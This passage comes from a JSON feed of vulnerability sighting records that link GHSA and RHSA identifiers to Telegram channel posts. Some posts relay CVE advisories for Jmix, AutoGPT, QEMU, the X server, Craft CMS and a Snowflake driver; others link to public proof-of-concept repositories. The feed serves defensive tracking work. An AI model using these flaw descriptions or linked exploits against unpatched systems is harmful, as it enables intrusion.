CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Jmix is a set of libraries and tools to speed up Spring Boot data-centric application development. In versions 1.0.0 to 1.6.1 and 2.0.0 to 2.3.4, the input parameter, which consists of a file path and name, can be manipulated to return the Content-Type header with text/html if the name part ends with .html. This could allow malicious JavaScript code to be executed in the browser. For a successful attack, a malicious file needs to be uploaded beforehand. This issue has been patched in versions 1.6.2 and 2.4.0. A workaround is provided on the Jmix documentation website.\n\ud83d\udccf Published: 2025-04-22T17:32:23.401Z\n\ud83d\udccf Modified: 2025-04-25T16:02:55.977Z\n\ud83d\udd17 References:\n1. https://github.com/jmix-framework/jmix/security/advisories/GHSA-x27v-f838-jh93\n2. https://docs.jmix.io/jmix/files-vulnerabilities.html\n3. https://docs.jmix.io/jmix/files-vulnerabilities.html#disable-files-endpoint-in-jmix-application", "creation_timestamp": "2025-04-25T16:07:19.000000Z"}, {"uuid": "ac4678d0-77ca-44d5-af36-dfa4385a219a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C8V-HWXC-2356", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7029", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22603\n\ud83d\udd25 CVSS Score: 7.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. Versions prior to autogpt-platform-beta-v0.4.2 contains a server-side request forgery (SSRF) vulnerability inside component (or block) `Send Web Request`. The root cause is  that IPV6 address is not restricted or filtered, which allows attackers to perform a server side request forgery to visit an IPV6 service. autogpt-platform-beta-v0.4.2 fixes the issue.\n\ud83d\udccf Published: 2025-03-10T18:09:51.419Z\n\ud83d\udccf Modified: 2025-03-10T19:17:04.406Z\n\ud83d\udd17 References:\n1. https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-4c8v-hwxc-2356\n2. https://github.com/Significant-Gravitas/AutoGPT/commit/26214e1b2c6777e0fae866642b23420adaadd6c4\n3. https://boatneck-faucet-cba.notion.site/SSRF-of-AutoGPT-153b650a4d88804d923ad65a015a7d61\n4. https://github.com/Significant-Gravitas/AutoGPT/blob/2121ffd06b26a438706bf642372cc46d81c94ddc/autogpt_platform/backend/backend/util/request.py#L11", "creation_timestamp": "2025-03-10T19:38:18.000000Z"}, {"uuid": "986ccbfc-73f2-4f99-8366-e04bf69cecf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4492", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6693\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: A stack based buffer overflow was found in the virtio-net device of QEMU. This issue occurs when flushing TX in the virtio_net_flush_tx function if guest features VIRTIO_NET_F_HASH_REPORT, VIRTIO_F_VERSION_1 and VIRTIO_NET_F_MRG_RXBUF are enabled. This could allow a malicious user to overwrite local variables allocated on the stack. Specifically, the `out_sg` variable could be used to read a part of process memory and send it to the wire, causing an information leak.\n\ud83d\udccf Published: 2024-01-02T09:15:08.280Z\n\ud83d\udccf Modified: 2025-05-06T08:11:12.675Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2962\n2. https://access.redhat.com/errata/RHSA-2025:4492\n3. https://access.redhat.com/security/cve/CVE-2023-6693\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2254580", "creation_timestamp": "2025-05-06T08:20:26.000000Z"}, {"uuid": "c9834397-09f6-4e91-85ea-0f57c28e64b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6RF6-F9QG-8V94", "type": "seen", "source": "https://t.me/securixy_kz/1240", "content": "", "creation_timestamp": "2026-07-12T22:00:06.770036Z"}, {"uuid": "e46fdba6-d0cc-4435-98a4-f446c85f5d5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C8CC-PHH7-XMXR", "type": "seen", "source": "https://t.me/securixy_kz/1231", "content": "", "creation_timestamp": "2026-07-12T22:00:06.727434Z"}, {"uuid": "03f8b435-9b83-4956-857b-173a53ce78d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62R4-HW23-CC8V", "type": "seen", "source": "https://t.me/securixy_kz/1282", "content": "", "creation_timestamp": "2026-07-12T22:00:06.489928Z"}, {"uuid": "2f060bbe-791f-437d-95d6-4ce4b6efd0e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9306", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19183", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49178\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the X server's request handling. Non-zero 'bytes to ignore' in a client's request can cause the server to skip processing another client's request, potentially leading to a denial of service.\n\ud83d\udccf Published: 2025-06-17T14:54:42.646Z\n\ud83d\udccf Modified: 2025-06-23T06:33:59.973Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49178\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369977", "creation_timestamp": "2025-06-23T06:45:53.000000Z"}, {"uuid": "eab99dd2-f73f-4de4-845a-c01c7b18956d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20190513-WEBUI", "type": "seen", "source": "https://t.me/antichat/4901", "content": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-webui\nCisco IOS XE Software Web UI Command Injection Vulnerability", "creation_timestamp": "2019-05-14T13:07:28.000000Z"}, {"uuid": "4db3e1d2-4ada-43d3-8925-0bf982caa681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MJ5-HJJJ-8RGW", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9404", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-55875 | GHSA-7mj5-hjjj-8rgw | http4k first CVE\nURL\uff1ahttps://github.com/JAckLosingHeart/CVE-2024-55875\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-13T06:30:07.000000Z"}, {"uuid": "95f9ca4a-f18d-47ab-a4a9-c58714e92be0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/34087", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/rizky412/CVE-2025-32433\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-24T21:18:00.000000Z"}, {"uuid": "9db703d7-7fc1-48f9-a9d8-df29e42d2bc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CRC6-R6C7-44Q3", "type": "published-proof-of-concept", "source": "Telegram/70ang71mEb6lYSNq2VZHiuuV7i7KfipPcLMkKo_Gk9-znXQ", "content": "", "creation_timestamp": "2026-04-14T23:22:29.000000Z"}, {"uuid": "88f33f86-3a77-4ff7-9bc4-bd2a7667a3e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HR25-G2J6-QJW6", "type": "published-proof-of-concept", "source": "Telegram/GYbH54sRbOOqgznzSrvNbIPKqa8_TpEiUvDUzTYtUUyxy-E", "content": "", "creation_timestamp": "2026-04-15T01:19:21.000000Z"}, {"uuid": "1b590543-194d-4793-9cab-e9508fc0ce72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5HVV-M4W4-GF6V", "type": "published-proof-of-concept", "source": "Telegram/GYbH54sRbOOqgznzSrvNbIPKqa8_TpEiUvDUzTYtUUyxy-E", "content": "", "creation_timestamp": "2026-04-15T01:19:21.000000Z"}, {"uuid": "dec87586-b1c8-455d-ba4c-528ffc331012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95MQ-XWJ4-R47P", "type": "seen", "source": "Telegram/BTRiP8nJHP-5om9x2g_w2G6e9UIMxwZAfdQggaCph1qz04g", "content": "", "creation_timestamp": "2026-04-15T23:27:13.000000Z"}, {"uuid": "81bdd677-8163-48bb-982d-d496811fecae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WRWH-RPQ4-87HF", "type": "seen", "source": "Telegram/5D912vOHN-G66auq1Hho6ww_p26h6YJ5ZFpozWyyt1z6weM", "content": "", "creation_timestamp": "2026-04-16T15:19:53.000000Z"}, {"uuid": "17798a55-881b-4b59-838e-05fa3c1b796c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R897-R9Q8-3P2X", "type": "published-proof-of-concept", "source": "Telegram/9gW43b9NBHUXUdmlPt1TRwT-SkC94TdNTb4ccUrHaSNYF5M", "content": "", "creation_timestamp": "2026-04-16T21:19:58.000000Z"}, {"uuid": "0ed49801-0c38-4fd1-8c49-3512c57da141", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FG4M-Q7CH-JQV5", "type": "published-proof-of-concept", "source": "Telegram/9gW43b9NBHUXUdmlPt1TRwT-SkC94TdNTb4ccUrHaSNYF5M", "content": "", "creation_timestamp": "2026-04-16T21:19:58.000000Z"}, {"uuid": "28be2001-dd33-452e-ba73-30b78c547a24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5Q48-Q4FM-G3M6", "type": "published-proof-of-concept", "source": "Telegram/vilnQ64f45V0K93eyMbGXUSRwitUexdwMg6sdyLUCQzylsw", "content": "", "creation_timestamp": "2026-04-09T17:22:32.000000Z"}, {"uuid": "e1b9223c-9e04-41fa-8a24-7274c008eede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HG73-4W7G-Q96W", "type": "seen", "source": "Telegram/HFSRmPQIuJm0mhlgKTjgnUZc9IKWtHrGIbUWbiDZawdQwcQ", "content": "", "creation_timestamp": "2026-04-09T19:22:33.000000Z"}, {"uuid": "6b54992e-a5df-4c93-8acd-ddefeef21384", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MC53-48W8-9G63", "type": "seen", "source": "Telegram/HFSRmPQIuJm0mhlgKTjgnUZc9IKWtHrGIbUWbiDZawdQwcQ", "content": "", "creation_timestamp": "2026-04-09T19:22:33.000000Z"}, {"uuid": "5ced0827-6c6b-405c-9c29-5990c39a40f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRW6-GWF8-VVR9", "type": "seen", "source": "Telegram/HFSRmPQIuJm0mhlgKTjgnUZc9IKWtHrGIbUWbiDZawdQwcQ", "content": "", "creation_timestamp": "2026-04-09T19:22:33.000000Z"}, {"uuid": "18a0009c-1083-4d8d-8e67-4f003350153f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8GGW-HFR6-RW3X", "type": "seen", "source": "Telegram/HFSRmPQIuJm0mhlgKTjgnUZc9IKWtHrGIbUWbiDZawdQwcQ", "content": "", "creation_timestamp": "2026-04-09T19:22:33.000000Z"}, {"uuid": "d788d91b-1076-43df-a0a9-d0f53f407da0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8F4V-XFM9-3244", "type": "seen", "source": "Telegram/aaKaZzhZCQTbBESVtGmK3HO5aOAiXiyEGsKbx2XTc93AVKM", "content": "", "creation_timestamp": "2026-04-09T23:30:50.000000Z"}, {"uuid": "34bea0dd-5675-4168-83c3-ab06301393d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PV9Q-275H-RH7X", "type": "seen", "source": "Telegram/aaKaZzhZCQTbBESVtGmK3HO5aOAiXiyEGsKbx2XTc93AVKM", "content": "", "creation_timestamp": "2026-04-09T23:30:50.000000Z"}, {"uuid": "33515c57-aaa8-49dd-8d51-e6618a50afb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8G7-9Q6V-P3X8", "type": "seen", "source": "Telegram/aaKaZzhZCQTbBESVtGmK3HO5aOAiXiyEGsKbx2XTc93AVKM", "content": "", "creation_timestamp": "2026-04-09T23:30:50.000000Z"}, {"uuid": "f029dc84-b320-4aac-84e3-dabca807e4f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HJH-FR4F-GXC4", "type": "published-proof-of-concept", "source": "Telegram/322WwBU1dw1XQZkuhsa_ku_ExWgO3IPBT_TwKsYVMIxa3Dc", "content": "", "creation_timestamp": "2026-04-10T19:31:00.000000Z"}, {"uuid": "f2ac52d5-e28e-4e73-b084-94d354fbbb9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3GW-9WW9-JMC3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13769", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32432\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector. This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.\n\ud83d\udccf Published: 2025-04-25T15:04:06.272Z\n\ud83d\udccf Modified: 2025-04-29T03:55:14.713Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3\n2. https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47\n3. https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical\n4. https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical\n5. https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical", "creation_timestamp": "2025-04-29T04:11:16.000000Z"}, {"uuid": "b3dea51c-ee46-470a-8aef-d011938d2819", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9FR2-PPRW-PP9J", "type": "seen", "source": "Telegram/UYy9QXiDWOzFY7CBVA8MS0Xr-No70LVttPhqPBLktKhMGyQ", "content": "", "creation_timestamp": "2026-04-09T17:23:27.000000Z"}, {"uuid": "3a0b7131-e48c-431c-bd66-63122aecb457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5JF-9VFQ-H4H7", "type": "seen", "source": "Telegram/UYy9QXiDWOzFY7CBVA8MS0Xr-No70LVttPhqPBLktKhMGyQ", "content": "", "creation_timestamp": "2026-04-09T17:23:27.000000Z"}, {"uuid": "7d613faf-a0bc-420d-8c8b-4c393c899f7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHRF-Q333-82FM", "type": "seen", "source": "Telegram/9GieXm2mvI1hTc72mHyuKx2RXs9Lk1GMse1mK9qILNsF3_0", "content": "", "creation_timestamp": "2026-04-01T23:28:03.000000Z"}, {"uuid": "20b74e9d-2292-4323-af03-3c981d0d58d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FQ3-C5W3-PJ3Q", "type": "seen", "source": "Telegram/9GieXm2mvI1hTc72mHyuKx2RXs9Lk1GMse1mK9qILNsF3_0", "content": "", "creation_timestamp": "2026-04-01T23:28:03.000000Z"}, {"uuid": "99b06f97-df43-4dcb-a7d1-00a2c6ee01dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X7WH-G25G-53VG", "type": "seen", "source": "Telegram/9GieXm2mvI1hTc72mHyuKx2RXs9Lk1GMse1mK9qILNsF3_0", "content": "", "creation_timestamp": "2026-04-01T23:28:03.000000Z"}, {"uuid": "565bce35-9185-40fe-9ab2-c1611bf6f9ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4VXV-4XQ4-P84H", "type": "seen", "source": "Telegram/9GieXm2mvI1hTc72mHyuKx2RXs9Lk1GMse1mK9qILNsF3_0", "content": "", "creation_timestamp": "2026-04-01T23:28:03.000000Z"}, {"uuid": "75a65e72-1efd-422d-9905-44b8b5bb6da9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FC4P-P49V-R948", "type": "seen", "source": "Telegram/9GieXm2mvI1hTc72mHyuKx2RXs9Lk1GMse1mK9qILNsF3_0", "content": "", "creation_timestamp": "2026-04-01T23:28:03.000000Z"}, {"uuid": "094d1cb2-9b0a-490c-9661-d4ffb040553b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PR3G-PHHR-H8FH", "type": "published-proof-of-concept", "source": "Telegram/Eww91bUMv30vOGGH8yfYO_7hUDha4B8YRA_tK9kM1Vo3PCM", "content": "", "creation_timestamp": "2026-04-13T13:15:33.000000Z"}, {"uuid": "2204da64-2d78-46d9-807b-8cfd545f4cd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RP9M-7R4C-75QG", "type": "seen", "source": "Telegram/t1F-Vx_aulmn07lvg5ppSTSOssGvqtwkUpkkBVUVRj_FPlk", "content": "", "creation_timestamp": "2026-04-06T19:29:09.000000Z"}, {"uuid": "edbb4e7e-8f39-47a2-8723-d5829c5264f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73JV-44C3-J5P2", "type": "seen", "source": "Telegram/3kkVms_lj1pOIg13wE1G-TkOn-GF7E-LtfSm5ZR30UKw8qQ", "content": "", "creation_timestamp": "2026-04-06T19:30:06.000000Z"}, {"uuid": "da238179-19cf-4d5d-8801-2ac0fba144bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQG5-487V-5MC6", "type": "published-proof-of-concept", "source": "Telegram/8eXn4QLj3W1_8AYc2pIsiDgfSWsuolTpz1YwE008yOgTXtw", "content": "", "creation_timestamp": "2026-04-07T17:29:14.000000Z"}, {"uuid": "0fb0942f-7735-4d18-a33e-e303f1cd0444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23W8-7333-P9FJ", "type": "seen", "source": "Telegram/yDDpU4nC0b44IAL16-yoyqmXwVbKF5D32H81GUj_gS-e3jc", "content": "", "creation_timestamp": "2026-04-07T17:29:27.000000Z"}, {"uuid": "7fec6b56-8d9b-4725-91d1-9155742918a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVMF-CFRQ-4J8F", "type": "seen", "source": "Telegram/yDDpU4nC0b44IAL16-yoyqmXwVbKF5D32H81GUj_gS-e3jc", "content": "", "creation_timestamp": "2026-04-07T17:29:27.000000Z"}, {"uuid": "3d7aed7c-3248-45ec-a024-2003786801d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FCP5-PWVJ-V7XM", "type": "seen", "source": "Telegram/d9ntGhgAXUNib3HVhoGCh5gTeuhEkXLp8JxGb0TRA4y7Jks", "content": "", "creation_timestamp": "2026-04-07T19:35:24.000000Z"}, {"uuid": "2a83ddfd-3058-4f5a-af75-3a5ec040b53f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MCH7-6V8F-C4J5", "type": "seen", "source": "Telegram/d9ntGhgAXUNib3HVhoGCh5gTeuhEkXLp8JxGb0TRA4y7Jks", "content": "", "creation_timestamp": "2026-04-07T19:35:24.000000Z"}, {"uuid": "7d911445-2776-434e-a422-91704ed30546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CQQ-RPVQ-G5QJ", "type": "seen", "source": "Telegram/WwaVaWmCpWfeYuJ8P8IqcUlHCUAeEgjmrCmKGvAa3A2q2J0", "content": "", "creation_timestamp": "2026-04-07T23:21:06.000000Z"}, {"uuid": "f95bb38b-fa0d-4af3-8c80-4237c9d7c690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CC2Q-QC34-JPRG", "type": "seen", "source": "Telegram/WwaVaWmCpWfeYuJ8P8IqcUlHCUAeEgjmrCmKGvAa3A2q2J0", "content": "", "creation_timestamp": "2026-04-07T23:21:06.000000Z"}, {"uuid": "41c82b04-fcaa-402e-aab5-feec8fe8b25f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65W6-PF7X-5G85", "type": "seen", "source": "Telegram/WwaVaWmCpWfeYuJ8P8IqcUlHCUAeEgjmrCmKGvAa3A2q2J0", "content": "", "creation_timestamp": "2026-04-07T23:21:06.000000Z"}, {"uuid": "edd5e558-5eec-4d12-8e1c-24f81ade50e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8RH5-4MVX-XJ7J", "type": "seen", "source": "Telegram/V1TSqfmZJdf_aKpoymM9Em6O2uNbTcVHb7f-sjGIlQ-q3Tg", "content": "", "creation_timestamp": "2026-04-08T17:17:30.000000Z"}, {"uuid": "1e1202b3-d8bd-42bd-b046-689462a6945e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H259-74H5-4RH9", "type": "seen", "source": "Telegram/V1TSqfmZJdf_aKpoymM9Em6O2uNbTcVHb7f-sjGIlQ-q3Tg", "content": "", "creation_timestamp": "2026-04-08T17:17:30.000000Z"}, {"uuid": "2d99437e-2fce-4820-a721-0e6a70979151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR76-5637-W3G9", "type": "seen", "source": "Telegram/jxEelE5YQIva3R3hkn6lv-_ITU5UuBT3ODsw8JQI8o6Btes", "content": "", "creation_timestamp": "2026-03-26T23:20:23.000000Z"}, {"uuid": "ea060c88-8e5f-4c81-9e9d-02fc2ce56173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFGG-MVXX-MGG7", "type": "seen", "source": "Telegram/67MCm8uvWkL1PFFVLqu-Ae9nhYuAfQmsKMFjCSOu4hiA4mc", "content": "", "creation_timestamp": "2026-03-27T01:18:53.000000Z"}, {"uuid": "cedff3c5-4c70-4d7b-9be9-520da6916680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q4Q8-7F2J-9H9F", "type": "seen", "source": "Telegram/67MCm8uvWkL1PFFVLqu-Ae9nhYuAfQmsKMFjCSOu4hiA4mc", "content": "", "creation_timestamp": "2026-03-27T01:18:53.000000Z"}, {"uuid": "eee75ac1-b34a-4d08-8670-044512cbe9f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WMJQ-JRM2-9WFR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13750", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46328\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: snowflake-connector-nodejs is a NodeJS driver for Snowflake. Versions starting from 1.10.0 to before 2.0.4, are vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. When using the Easy Logging feature on Linux and macOS the Driver reads logging configuration from a user-provided file. On Linux and macOS the Driver verifies that the configuration file can be written to only by its owner. That check was vulnerable to a TOCTOU race condition and failed to verify that the file owner matches the user running the Driver. This could allow a local attacker with write access to the configuration file or the directory containing it to overwrite the configuration and gain control over logging level and output location. This issue has been patched in version 2.0.4.\n\ud83d\udccf Published: 2025-04-28T22:33:09.632Z\n\ud83d\udccf Modified: 2025-04-28T22:33:09.632Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-nodejs/security/advisories/GHSA-wmjq-jrm2-9wfr\n2. 